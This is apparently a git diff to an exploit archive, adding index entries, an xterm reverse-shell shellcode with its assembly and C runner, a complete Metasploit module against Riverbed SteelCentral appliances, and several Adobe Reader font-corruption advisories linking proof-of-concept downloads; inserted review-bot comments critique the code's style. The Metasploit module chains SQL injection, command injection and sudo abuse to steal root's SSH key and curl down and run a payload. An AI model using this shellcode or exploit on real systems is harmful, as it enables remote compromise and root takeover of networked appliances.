diff --git a/files.csv b/files.csv
index de78f331c..c909d51b3 100755
--- a/files.csv
+++ b/files.csv
@@ -11736,6 +11736,7 @@ id,file,description,date,author,platform,type,port
 40089,platforms/multiple/dos/40089.txt,"Adobe Flash - LMZA Property Decoding Heap Corruption",2016-07-11,"Google Security Research",multiple,dos,0
 40090,platforms/multiple/dos/40090.txt,"Adobe Flash - ATF Image Packing Overflow",2016-07-11,"Google Security Research",multiple,dos,0
 40091,platforms/php/remote/40091.rb,"Tiki Wiki 15.1 - Unauthenticated File Upload Vulnerability (Metasploit)",2016-07-11,"Mehmet Ince",php,remote,80
+40095,platforms/multiple/dos/40095.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption",2016-07-13,COSIG,multiple,dos,0
 30170,platforms/php/webapps/30170.txt,"Beehive Forum 0.7.1 Links.php Multiple Cross-Site Scripting Vulnerabilities",2007-06-11,"Ory Segal",php,webapps,0
 13260,platforms/bsdi_x86/shellcode/13260.c,"bsdi/x86 - execve /bin/sh toupper evasion (97 bytes)",2004-09-26,N/A,bsdi_x86,shellcode,0
 13261,platforms/freebsd_x86/shellcode/13261.txt,"FreeBSD i386/AMD64 Execve /bin/sh - Anti-Debugging",2009-04-13,c0d3_z3r0,freebsd_x86,shellcode,0
@@ -30539,6 +30540,9 @@ id,file,description,date,author,platform,type,port
 33892,platforms/windows/local/33892.rb,".NET Deployment Service - IE Sandbox Escape (MS14-009)",2014-06-27,metasploit,windows,local,0
 33893,platforms/windows/local/33893.rb,"Registry Symlink - IE Sandbox Escape (MS13-097)",2014-06-27,metasploit,windows,local,0
 33894,platforms/multiple/webapps/33894.txt,"Python CGIHTTPServer Encoded Path Traversal",2014-06-27,"RedTeam Pentesting",multiple,webapps,0
+40096,platforms/multiple/dos/40096.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (2)",2016-07-13,COSIG,multiple,dos,0
+40097,platforms/multiple/dos/40097.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (3)",2016-07-13,COSIG,multiple,dos,0
+40098,platforms/multiple/dos/40098.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (4)",2016-07-13,COSIG,multiple,dos,0
 33896,platforms/php/webapps/33896.txt,"WordPress Simple Share Buttons Adder Plugin 4.4 - Multiple Vulnerabilities",2014-06-27,dxw,php,webapps,80
 33897,platforms/multiple/webapps/33897.txt,"Endeca Latitude 2.2.2 - CSRF Vulnerability",2014-06-27,"RedTeam Pentesting",multiple,webapps,0
 33899,platforms/linux/local/33899.txt,"Chkrootkit 0.49 - Local Root Vulnerability",2014-06-28,"Thomas Stangner",linux,local,0
@@ -31574,6 +31578,11 @@ id,file,description,date,author,platform,type,port
 35056,platforms/hardware/webapps/35056.txt,"Dell EqualLogic Storage - Directory Traversal",2014-10-25,"XLabs Security",hardware,webapps,0
 35057,platforms/php/webapps/35057.py,"Creative Contact Form (WordPress 0.9.7 and Joomla 2.0.0) - Shell Upload Vulnerability",2014-10-25,"Claudio Viviani",php,webapps,0
 35058,platforms/bsd/dos/35058.c,"OpenBSD <= 5.5 - Local Kernel Panic",2014-10-25,nitr0us,bsd,dos,0
+40099,platforms/multiple/dos/40099.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (5)",2016-07-13,COSIG,multiple,dos,0
+40100,platforms/multiple/dos/40100.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (6)",2016-07-13,COSIG,multiple,dos,0
+40101,platforms/multiple/dos/40101.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (7)",2016-07-13,COSIG,multiple,dos,0
+40102,platforms/multiple/dos/40102.txt,"Adobe Flash Player 22.0.0.192 - DefineBitsJPEG2 Memory Corruption",2016-07-13,COSIG,multiple,dos,0
+40103,platforms/multiple/dos/40103.txt,"Adobe Flash Player 22.0.0.192 - DefineSprite Memory Corruption",2016-07-13,COSIG,multiple,dos,0
 35127,platforms/jsp/webapps/35127.txt,"Progress OpenEdge 11.2 - Directory Traversal",2014-10-31,"XLabs Security",jsp,webapps,9090
 35060,platforms/php/webapps/35060.txt,"Aigaion 1.3.4 - 'ID' Parameter SQL Injection Vulnerability",2010-12-07,KnocKout,php,webapps,0
 35061,platforms/linux/dos/35061.c,"GNU glibc 'regcomp()' Stack Exhaustion Denial Of Service Vulnerability",2010-12-07,"Maksymilian Arciemowicz",linux,dos,0
@@ -35271,6 +35280,8 @@ id,file,description,date,author,platform,type,port
 39020,platforms/windows/dos/39020.txt,"Adobe Flash TextField.gridFitType Setter - Use-After-Free",2015-12-17,"Google Security Research",windows,dos,0
 39021,platforms/windows/dos/39021.txt,"Adobe Flash MovieClip.lineStyle - Use-After-Frees",2015-12-17,"Google Security Research",windows,dos,0
 39022,platforms/windows/dos/39022.txt,"Adobe Flash GradientFill - Use-After-Frees",2015-12-17,"Google Security Research",windows,dos,0
+40105,platforms/multiple/dos/40105.txt,"Adobe Flash Player 22.0.0.192 - TAG Memory Corruption",2016-07-13,COSIG,multiple,dos,0
+40104,platforms/multiple/dos/40104.txt,"Adobe Flash Player 22.0.0.192 - SceneAndFrameData Memory Corruption",2016-07-13,COSIG,multiple,dos,0
 39025,platforms/windows/dos/39025.txt,"Windows Kernel win32k!OffsetChildren - Null Pointer Dereference",2015-12-17,"Nils Sommer",windows,dos,0
 39026,platforms/win32/dos/39026.txt,"win32k Desktop and Clipboard - Null Pointer Derefence",2015-12-17,"Nils Sommer",win32,dos,0
 39027,platforms/win32/dos/39027.txt,"win32k Clipboard Bitmap - Use-After-Free Vulnerability",2015-12-17,"Nils Sommer",win32,dos,0
@@ -35919,6 +35930,7 @@ id,file,description,date,author,platform,type,port
 39716,platforms/hardware/webapps/39716.py,"Gemtek CPE7000 / WLTCS-106 - Multiple Vulnerabilities",2016-04-21,"Federico Ramondino",hardware,webapps,443
 39718,platforms/lin_x86-64/shellcode/39718.c,"Linux/x86_64 - bindshell (Port 5600) - 86 bytes",2016-04-21,"Ajith Kp",lin_x86-64,shellcode,0
 39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,windows,local,0
+40094,platforms/win32/shellcode/40094.c,"Windows x86 URLDownloadToFileA()+SetFileAttributesA()+WinExec()+ExitProcess() Shellcode",2016-07-13,"Roziul Hasan Khan Shifat",win32,shellcode,0
 39720,platforms/jsp/webapps/39720.txt,"Totemomail 4.x / 5.x - Persistent XSS",2016-04-25,Vulnerability-Lab,jsp,webapps,0
 39721,platforms/ios/webapps/39721.txt,"C/C++ Offline Compiler and C For OS - Persistent XSS",2016-04-25,Vulnerability-Lab,ios,webapps,0
 39722,platforms/lin_x86/shellcode/39722.c,"Linux x86 Reverse TCP Shellcode (ipv6)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0
@@ -36256,3 +36268,8 @@ id,file,description,date,author,platform,type,port
 40077,platforms/xml/webapps/40077.txt,"CyberPower Systems PowerPanel 3.1.2 - XXE Out-Of-Band Data Retrieval",2016-07-08,LiquidWorm,xml,webapps,3052
 40078,platforms/php/webapps/40078.txt,"Streamo Online Radio And TV Streaming CMS - SQL Injection",2016-07-08,N4TuraL,php,webapps,80
 40079,platforms/lin_x86-64/shellcode/40079.c,"Linux x86-64 Continuously-Probing Reverse Shell via Socket + Port-range + Password - 172 Bytes",2016-07-11,CripSlick,lin_x86-64,shellcode,0
+40106,platforms/windows/webapps/40106.txt,"GSX Analyzer 10.12 and 11 - Main.swf Hardcoded Superadmin Credentials",2016-07-13,ndevnull,windows,webapps,0
+40107,platforms/windows/local/40107.rb,"MS16-032 Secondary Logon Handle Privilege Escalation",2016-07-13,metasploit,windows,local,0
+40108,platforms/linux/remote/40108.rb,"Riverbed SteelCentral NetProfiler/NetExpress Remote Code Execution",2016-07-13,metasploit,linux,remote,443
+40109,platforms/xml/webapps/40109.txt,"Apache Archiva 1.3.9 - Multiple CSRF Vulnerabilities",2016-07-13,"Julien Ahrens",xml,webapps,0
+40110,platforms/lin_x86/shellcode/40110.c,"Linux x86 Reverse Shell using Xterm ///usr/bin/xterm -display 127.1.1.1:10",2016-07-13,RTV,lin_x86,shellcode,0
diff --git a/platforms/lin_x86/shellcode/40110.c b/platforms/lin_x86/shellcode/40110.c
new file mode 100755
index 000000000..67397b1a3
--- /dev/null
+++ b/platforms/lin_x86/shellcode/40110.c
@@ -0,0 +1,78 @@ +/* + # Title : Linux , Reverse Shell using Xterm , ///usr/bin/xterm -display 127.1.1.1:10 + # Date : 12-07-2016 + # Author : RTV + # Tested On : Ubuntu x86 + # shellcode : \x31\xc0\x31\xd2\x50\x68\x31\x3a\x31\x30\x68\x31\x2e\x31\x2e\x68\x31\x32\x37\x2e\x89\xe6\x50\x68\x70\x6c\x61\x79\x68\x2d\x64\x69\x73\x89\xe7\x50\x68\x74\x65\x72\x6d\x68\x69\x6e\x2f\x78\x68\x73\x72\x2f\x62\x68\x2f\x2f\x2f\x75\x89\xe3\x50\x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80 +*/ +/* +;********************************** +;xterm.asm +;xterm reverse shell , 32 bit Linux +;nasm -f elf32 -o xterm.o xterm.asm && ld -o xtermrev xterm.o +;Shellcode length 68 + + +section .text + global _start +_start: +xor eax,eax +xor edx,edx +push eax +push 0x30313a31 ; setting the listening IP and display , used 127.1.1.1:10 , change this section to set your IP +push 0x2e312e31 +push 0x2e373231 +mov esi,esp +push eax +push 0x79616c70 ; -display +push 0x7369642d +mov edi,esp +push eax +push 0x6d726574 ; ///usr/bin/xterm +push 0x782f6e69 +push 0x622f7273 +push 0x752f2f2f +mov ebx,esp +push eax +push esi +push edi +push ebx +mov ecx,esp +mov al,11 +int 0x80 + +;********************************** + +/** shellcode.c , gcc -fno-stack-protector -z execstack -o xtermrev shellcode.c + +*/ + +#include +#include + +unsigned char code[] = \ +"\x31\xc0\x31\xd2\x50\x68\x31\x3a\x31\x30\x68\x31\x2e\x31\x2e\x68\x31\x32\x37\x2e\x89\xe6\x50\x68\x70\x6c\x61\x79\x68\x2d\x64\x69\x73\x89\xe7\x50\x68\x74\x65\x72\x6d\x68\x69\x6e\x2f\x78\x68\x73\x72\x2f\x62\x68\x2f\x2f\x2f\x75\x89\xe3\x50\x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80"; +main() +{ + + printf("Shellcode Length: %d\n", strlen(code)); + + int (*ret)() = (int(*)())code; + + ret(); + +} + +/*************************** + +Notes : - + +Xterm reverse shell + +Use these commands to listen at your side + +Xnest :10 ( starting Xserver with display 10) +xhost +targetip ( authorize the target ip to connect back) + +# SLAE - 739 +*/ \ No newline at end of file 
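Review bot: `printf("Shellcode Length: %d\n", strlen(code));` passes a `size_t` to a `%d` conversion, which is undefined behaviour and prints a wrong length wherever `int` and `size_t` differ in width; the matching specifier is `printf("Shellcode Length: %zu\n", strlen(code));`. The implicit-int `main()` is rejected by C99 and later compilers in strict mode, so `int main(void)` is the portable spelling. The two `#include` directives show no header names on this page, presumably lost in rendering; worth confirming the committed file names them, since `printf` and `strlen` otherwise compile only with implicit declarations.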
diff --git a/platforms/linux/remote/40108.rb b/platforms/linux/remote/40108.rb
new file mode 100755
index 000000000..711d2c260
--- /dev/null
+++ b/platforms/linux/remote/40108.rb
@@ -0,0 +1,318 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpServer + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + require 'digest' + + def initialize(info={}) + super(update_info(info, + 'Name' => "Riverbed SteelCentral NetProfiler/NetExpress Remote Code Execution", + 'Description' => %q{ + This module exploits three separate vulnerabilities found in the Riverbed SteelCentral NetProfiler/NetExpress + virtual appliances to obtain remote command execution as the root user. A SQL injection in the login form + can be exploited to add a malicious user into the application's database. An attacker can then exploit a + command injection vulnerability in the web interface to obtain arbitrary code execution. Finally, an insecure + configuration of the sudoers file can be abused to escalate privileges to root. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => [ 'Francesco Oddo ' ], + 'References' => + [ + [ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Riverbed-SteelCentral-NetProfilerNetExpress-Advisory.pdf' ] + ], + 'Platform' => 'linux', + 'Arch' => ARCH_X86_64, + 'Stance' => Msf::Exploit::Stance::Aggressive, + 'Targets' => + [ + [ 'Riverbed SteelCentral NetProfiler 10.8.7 / Riverbed NetExpress 10.8.7', { }] + ], + 'DefaultOptions' => + { + 'SSL' => true + }, + 'Privileged' => false, + 'DisclosureDate' => "Jun 27 2016", + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The target URI', '/']), + OptString.new('RIVERBED_USER', [true, 'Web interface user account to add', 'user']), + OptString.new('RIVERBED_PASSWORD', [true, 'Web interface user password', 'riverbed']), + OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10]), + Opt::RPORT(443) + ], + self.class + ) + end + + def check + json_payload_check = "{\"username\":\"check_vulnerable%'; SELECT PG_SLEEP(2)--\", \"password\":\"pwd\"}"; + + # Verifies existence of login SQLi + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path,'/api/common/1.0/login'), + 'ctype' => 'application/json', + 'encode_params' => false, + 'data' => json_payload_check + }) + + if res && res.body && res.body.include?('AUTH_DISABLED_ACCOUNT') + return Exploit::CheckCode::Vulnerable + end + + Exploit::CheckCode::Safe + end + + def exploit + + print_status("Attempting log in to target appliance") + @sessid = do_login + + print_status("Confirming command injection vulnerability") + test_cmd_inject + vprint_status('Ready to execute payload on appliance') + + @elf_sent = false + # Generate payload + @pl = generate_payload_exe + + if @pl.nil? 
+ fail_with(Failure::BadConfig, 'Please select a valid Linux payload') + end + + # Start the server and use primer to trigger fetching and running of the payload + begin + Timeout.timeout(datastore['HTTPDELAY']) { super } + rescue Timeout::Error + end + + end + + def get_nonce + # Function to get nonce from login page + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path,'/index.php'), + }) + + if res && res.body && res.body.include?('nonce_') + html = res.get_html_document + nonce_field = html.at('input[@name="nonce"]') + nonce = nonce_field.attributes["value"] + else + fail_with(Failure::Unknown, 'Unable to get login nonce.') + end + + # needed as login nonce is bounded to preauth SESSID cookie + sessid_cookie_preauth = (res.get_cookies || '').scan(/SESSID=(\w+);/).flatten[0] || '' + + return [nonce, sessid_cookie_preauth] + + end + + def do_login + + uname = datastore['RIVERBED_USER'] + passwd = datastore['RIVERBED_PASSWORD'] + + nonce, sessid_cookie_preauth = get_nonce + post_data = "login=1&nonce=#{nonce}&uname=#{uname}&passwd=#{passwd}" + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path,'/index.php'), + 'cookie' => "SESSID=#{sessid_cookie_preauth}", + 'ctype' => 'application/x-www-form-urlencoded', + 'encode_params' => false, + 'data' => post_data + }) + + # Exploit login SQLi if credentials are not valid. + if res && res.body && res.body.include?('
'POST', + 'uri' => normalize_uri(target_uri.path,'/index.php'), + 'cookie' => "SESSID=#{sessid_cookie_preauth}", + 'ctype' => 'application/x-www-form-urlencoded', + 'encode_params' => false, + 'data' => post_data + }) + + sessid_cookie = (res.get_cookies || '').scan(/SESSID=(\w+);/).flatten[0] || '' + print_status("Saving login credentials into Metasploit DB") + report_cred(uname, passwd) + else + print_status("Valid login credentials provided. Successfully logged in") + sessid_cookie = (res.get_cookies || '').scan(/SESSID=(\w+);/).flatten[0] || '' + print_status("Saving login credentials into Metasploit DB") + report_cred(uname, passwd) + end + + return sessid_cookie + + end + + def report_cred(username, password) + # Function used to save login credentials into Metasploit database + service_data = { + address: rhost, + port: rport, + service_name: ssl ? 'https' : 'http', + protocol: 'tcp', + workspace_id: myworkspace_id + } + + credential_data = { + module_fullname: self.fullname, + origin_type: :service, + username: username, + private_data: password, + private_type: :password + }.merge(service_data) + + credential_core = create_credential(credential_data) + + login_data = { + core: credential_core, + last_attempted_at: DateTime.now, + status: Metasploit::Model::Login::Status::SUCCESSFUL + }.merge(service_data) + + create_credential_login(login_data) + end + + def create_user + # Function exploiting login SQLi to create a malicious user + username = datastore['RIVERBED_USER'] + password = datastore['RIVERBED_PASSWORD'] + + usr_payload = generate_sqli_payload(username) + pwd_hash = Digest::SHA512.hexdigest(password) + pass_payload = generate_sqli_payload(pwd_hash) + uid = rand(999) + + json_payload_sqli = "{\"username\":\"adduser%';INSERT INTO users (username, password, uid) VALUES ((#{usr_payload}), (#{pass_payload}), #{uid});--\", \"password\":\"pwd\"}"; + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => 
normalize_uri(target_uri.path,'/api/common/1.0/login'), + 'ctype' => 'application/json', + 'encode_params' => false, + 'data' => json_payload_sqli + }) + + json_payload_checkuser = "{\"username\":\"#{username}\", \"password\":\"#{password}\"}"; + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path,'/api/common/1.0/login'), + 'ctype' => 'application/json', + 'encode_params' => false, + 'data' => json_payload_checkuser + }) + + if res && res.body && res.body.include?('session_id') + print_status("User account successfully created, login credentials: '#{username}':'#{password}'") + else + fail_with(Failure::UnexpectedReply, 'Unable to add user to database') + end + + end + + def generate_sqli_payload(input) + # Function to generate sqli payload for user/pass in expected format + payload = '' + input_array = input.strip.split('') + for index in 0..input_array.length-1 + payload = payload << 'CHR(' + input_array[index].ord.to_s << ')||' + end + + # Gets rid of the trailing '||' and newline + payload = payload[0..-3] + + return payload + end + + def test_cmd_inject + post_data = "xjxfun=get_request_key&xjxr=1457064294787&xjxargs[]=Stoken; id;" + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path,'/index.php?page=licenses'), + 'cookie' => "SESSID=#{@sessid}", + 'ctype' => 'application/x-www-form-urlencoded', + 'encode_params' => false, + 'data' => post_data + }) + + unless res && res.body.include?('uid=') + fail_with(Failure::UnexpectedReply, 'Could not inject command, may not be vulnerable') + end + + end + + def cmd_inject(cmd) + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path,'/index.php?page=licenses'), + 'cookie' => "SESSID=#{@sessid}", + 'ctype' => 'application/x-www-form-urlencoded', + 'encode_params' => false, + 'data' => cmd + }) + + end + + # Deliver payload to appliance and make it run it + def primer + + # Gets the autogenerated uri + 
payload_uri = get_uri + + root_ssh_key_private = rand_text_alpha_lower(8) + binary_payload = rand_text_alpha_lower(8) + + print_status("Privilege escalate to root and execute payload") + + privesc_exec_cmd = "xjxfun=get_request_key&xjxr=1457064346182&xjxargs[]=Stoken; sudo -u mazu /usr/mazu/bin/mazu-run /usr/bin/sudo /bin/date -f /opt/cascade/vault/ssh/root/id_rsa | cut -d ' ' -f 4- | tr -d '`' | tr -d \"'\" > /tmp/#{root_ssh_key_private}; chmod 600 /tmp/#{root_ssh_key_private}; ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -i /tmp/#{root_ssh_key_private} root@localhost '/usr/bin/curl -k #{payload_uri} -o /tmp/#{binary_payload}; chmod 755 /tmp/#{binary_payload}; /tmp/#{binary_payload}'" + + cmd_inject(privesc_exec_cmd) + + register_file_for_cleanup("/tmp/#{root_ssh_key_private}") + register_file_for_cleanup("/tmp/#{binary_payload}") + + vprint_status('Finished primer hook, raising Timeout::Error manually') + raise(Timeout::Error) + end + + #Handle incoming requests from the server + def on_request_uri(cli, request) + vprint_status("on_request_uri called: #{request.inspect}") + print_status('Sending the payload to the server...') + @elf_sent = true + send_response(cli, @pl) + end + +end \ No newline at end of file diff --git a/platforms/multiple/dos/40095.txt b/platforms/multiple/dos/40095.txt new file mode 100755 index 000000000..49ebad8c4 --- /dev/null +++ b/platforms/multiple/dos/40095.txt 
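Review bot: In `do_login` both branches of the `if` end with the same three statements (the `sessid_cookie` extraction from `res.get_cookies`, the `print_status("Saving login credentials into Metasploit DB")`, and `report_cred(uname, passwd)`); hoisting them below the `if`/`else` removes the duplication and leaves only the SQLi retry and the two differing status messages inside the branches. The comment in `generate_sqli_payload` says the slice removes the trailing `'||'` and a newline, but `payload[0..-3]` drops exactly two characters and `input.strip` has already removed surrounding whitespace, so the comment should read `# Gets rid of the trailing '||'`. The index loop there is un-idiomatic Ruby; `input.strip.each_char.map { |c| "CHR(#{c.ord})" }.join('||')` expresses the same transformation without the manual slice. Note that the hunk is cut on this page between the `include?('` test in `do_login` and the retry request that follows, so the condition itself is not visible here.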
@@ -0,0 +1,56 @@
+#####################################################################################
+
+# Application: Adobe Acrobat Reader DC
+# Platforms: Windows,OSX
+# Versions: 15.016.20045 and earlier
+# Author: Sébastien Morin and Pier-Luc Maltais of COSIG
+# Website: https://cosig.gouv.qc.ca/en/advisory/
+# Twitter: @COSIG_
+# Date: July 12, 2016
+# CVE: CVE-2016-4205
+# COSIG-2016-30
+
+#####################################################################################
+
+1) Introduction
+2) Report Timeline
+3) Technical details
+4) POC
+
+#####################################################################################
+
+================
+1) Introduction
+================
+Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).
+
+(https://en.wikipedia.org/wiki/Adobe_Acrobat)
+
+#####################################################################################
+
+====================
+2) Report Timeline
+====================
+2016-05-18: Sébastien Morin and Pier-Luc Maltais of COSIG report this vulnerability to Adobe PSIRT;
+2016-06-08: Adobe PSIRT confirm this vulnerability;
+2016-07-12: Adobe fixed the issue (APSB16-26);
+2016-07-12: Advisory released by COSIG;
+
+#####################################################################################
+
+=====================
+3) Technical details
+=====================
+The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction
+that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data.
+
+#####################################################################################
+
+===========
+4) POC
+===========
+
+https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-30.pdf
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40095.zip
+
+####################################################################################
\ No newline at end of file
diff --git a/platforms/multiple/dos/40096.txt b/platforms/multiple/dos/40096.txt
new file mode 100755
index 000000000..efd374b40
--- /dev/null
+++ b/platforms/multiple/dos/40096.txt
@@ -0,0 +1,56 @@
+#####################################################################################
+
+# Application: Adobe Acrobat Reader DC
+# Platforms: Windows,OSX
+# Versions: 15.016.20045 and earlier
+# Author: Sébastien Morin and Pier-Luc Maltais of COSIG
+# Website: https://cosig.gouv.qc.ca/en/advisory/
+# Twitter: @COSIG_
+# Date: July 12, 2016
+# CVE: CVE-2016-4204
+# COSIG-2016-29
+
+#####################################################################################
+
+1) Introduction
+2) Report Timeline
+3) Technical details
+4) POC
+
+#####################################################################################
+
+================
+1) Introduction
+================
+Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).
+
+(https://en.wikipedia.org/wiki/Adobe_Acrobat)
+
+#####################################################################################
+
+====================
+2) Report Timeline
+====================
+2016-05-18: Sébastien Morin and Pier-Luc Maltais of COSIG report this vulnerability to Adobe PSIRT;
+2016-06-08: Adobe PSIRT confirm this vulnerability;
+2016-07-12: Adobe fixed the issue (APSB16-26);
+2016-07-12: Advisory released by COSIG;
+
+#####################################################################################
+
+=====================
+3) Technical details
+=====================
+The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction
+that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data.
+
+#####################################################################################
+
+===========
+4) POC
+===========
+
+https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-29.pdf
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40096.zip
+
+####################################################################################
\ No newline at end of file
diff --git a/platforms/multiple/dos/40097.txt b/platforms/multiple/dos/40097.txt
new file mode 100755
index 000000000..8766b7ec1
--- /dev/null
+++ b/platforms/multiple/dos/40097.txt
@@ -0,0 +1,56 @@
+#####################################################################################
+
+# Application: Adobe Acrobat Reader DC
+# Platforms: Windows,OSX
+# Versions: 15.016.20045 and earlier
+# Author: Sébastien Morin of COSIG
+# Website: https://cosig.gouv.qc.ca/en/advisory/
+# Twitter: @COSIG_
+# Date: July 12, 2016
+# CVE: CVE-2016-4203
+# COSIG-2016-28
+
+#####################################################################################
+
+1) Introduction
+2) Report Timeline
+3) Technical details
+4) POC
+
+#####################################################################################
+
+================
+1) Introduction
+================
+Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).
+
+(https://en.wikipedia.org/wiki/Adobe_Acrobat)
+
+#####################################################################################
+
+====================
+2) Report Timeline
+====================
+2016-05-18: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT;
+2016-06-08: Adobe PSIRT confirm this vulnerability;
+2016-07-12: Adobe fixed the issue (APSB16-26);
+2016-07-12: Advisory released by COSIG;
+
+#####################################################################################
+
+=====================
+3) Technical details
+=====================
+The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction
+that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data.
+
+#####################################################################################
+
+===========
+4) POC
+===========
+
+https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-28.pdf
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40097.zip
+
+####################################################################################
\ No newline at end of file
diff --git a/platforms/multiple/dos/40098.txt b/platforms/multiple/dos/40098.txt
new file mode 100755
index 000000000..3d1db4d63
--- /dev/null
+++ b/platforms/multiple/dos/40098.txt
@@ -0,0 +1,56 @@
+#####################################################################################
+
+# Application: Adobe Acrobat Reader DC
+# Platforms: Windows,OSX
+# Versions: 15.016.20045 and earlier
+# Author: Sébastien Morin of COSIG
+# Website: https://cosig.gouv.qc.ca/en/advisory/
+# Twitter: @COSIG_
+# Date: July 12, 2016
+# CVE: CVE-2016-4208
+# COSIG-2016-27
+
+#####################################################################################
+
+1) Introduction
+2) Report Timeline
+3) Technical details
+4) POC
+
+#####################################################################################
+
+================
+1) Introduction
+================
+Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).
+
+(https://en.wikipedia.org/wiki/Adobe_Acrobat)
+
+#####################################################################################
+
+====================
+2) Report Timeline
+====================
+2016-05-18: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT;
+2016-06-08: Adobe PSIRT confirm this vulnerability;
+2016-07-12: Adobe fixed the issue (APSB16-26);
+2016-07-12: Advisory released by COSIG;
+
+#####################################################################################
+
+=====================
+3) Technical details
+=====================
+The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction
+that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data.
+
+#####################################################################################
+
+===========
+4) POC
+===========
+
+https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-27.pdf
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40098.zip
+
+####################################################################################
\ No newline at end of file
diff --git a/platforms/multiple/dos/40099.txt b/platforms/multiple/dos/40099.txt
new file mode 100755
index 000000000..7b0174c0f
--- /dev/null
+++ b/platforms/multiple/dos/40099.txt
@@ -0,0 +1,56 @@
+#####################################################################################
+
+# Application: Adobe Acrobat Reader DC
+# Platforms: Windows,OSX
+# Versions: 15.016.20045 and earlier
+# Author: Sébastien Morin of COSIG
+# Website: https://cosig.gouv.qc.ca/en/advisory/
+# Twitter: @COSIG_
+# Date: July 12, 2016
+# CVE: CVE-2016-4207
+# COSIG-2016-26
+
+#####################################################################################
+
+1) Introduction
+2) Report Timeline
+3) Technical details
+4) POC
+
+#####################################################################################
+
+================
+1) Introduction
+================
+Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).
+
+(https://en.wikipedia.org/wiki/Adobe_Acrobat)
+
+#####################################################################################
+
+====================
+2) Report Timeline
+====================
+2016-05-18: Sébastien Morin of COSIG report this vulnerability to Adobe PSIRT;
+2016-06-08: Adobe PSIRT confirm this vulnerability;
+2016-07-12: Adobe fixed the issue (APSB16-26);
+2016-07-12: Advisory released by COSIG;
+
+#####################################################################################
+
+=====================
+3) Technical details
+=====================
+The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction
+that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data.
+
+#####################################################################################
+
+===========
+4) POC
+===========
+
+https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-26.pdf
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40099.zip
+
+####################################################################################
\ No newline at end of file
diff --git a/platforms/multiple/dos/40100.txt b/platforms/multiple/dos/40100.txt
new file mode 100755
index 000000000..f92d6f6af
--- /dev/null
+++ b/platforms/multiple/dos/40100.txt
